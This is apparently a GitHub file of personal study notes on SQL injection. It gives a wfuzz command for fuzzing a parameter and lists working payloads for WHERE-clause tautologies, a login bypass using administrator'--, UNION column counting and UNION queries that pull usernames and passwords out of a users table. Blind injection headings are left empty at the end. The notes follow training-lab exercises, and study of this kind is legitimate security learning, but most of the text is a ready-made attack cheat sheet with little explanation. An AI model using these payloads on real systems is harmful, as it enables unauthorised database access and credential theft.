-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathSQL Injection
59 lines (31 loc) · 2.38 KB
/
SQL Injection
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
wfuzz -c -z file,/usr/share/wordlists/wfuzz/Injections/SQL.txt -d "id=FUZZ" -u http://<>
<SQL Injection>
- SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
select * from customers where city = 'london' || show only city
select * from customers where city = ''' || if this ' then query will be city=' ' ' -> single or double quotes
select * from customers where city = ''--' limit 1 || if this '-- then query will be city=' '-- ' -> rest query will be commted
select * from customers where city = 'london' or 1=1-- || or 1=1-- will return all city which means true / encode url
- SQL injection vulnerability allowing login bypass
in the username and password field, pass single qoutes ' on username or password field, or random name and pass then see the error message..
modify the username parameter and giving it the value: administrator'-- || this indicates that username is administrator, and there is no filter on password, is passed by comment..
- SQL injection UNION attack (determining the number of columns returned by the query)
this attacks can be performed by two techniques:
1. union select null
2. order by 1, 2, 3
return null values datab using this '+UNION+SELECT+NULL-- || here two columns are exist.. NULL can be 1,2,3 or more
return null values datab using this '+UNION+SELECT+NULL,NULL-- || here two columns are exist.. NULL can be 1,2,3 or more
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
- SQL injection UNION attack (finding a column containing text)
Lifestyle'+union+select+null,null',null-- || first determine the number of colums using NULL, check for respose
Lifestyle'+union+select+'12345',null','bangladesh'-- || then replace NULL using string or integer values, check for respose
- SQL injection UNION attack, retrieving multiple values in a single column
Lifestyle'+UNION+SELECT+NULL,NULL--
Lifestyle'+UNION+SELECT+'ABCD','EFGH'--
Lifestyle'+UNION+SELECT+username,+password+FROM+users--
Lifestyle'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
Lifestyle'+UNION+SELECT+BANNER,+NULL+FROM+v$version-- || oracle find, NULL is used, bcause it has two colums.
<Blind SQL Injection>
Content Based Blind SQL Injection
Time Based Blind SQL Injection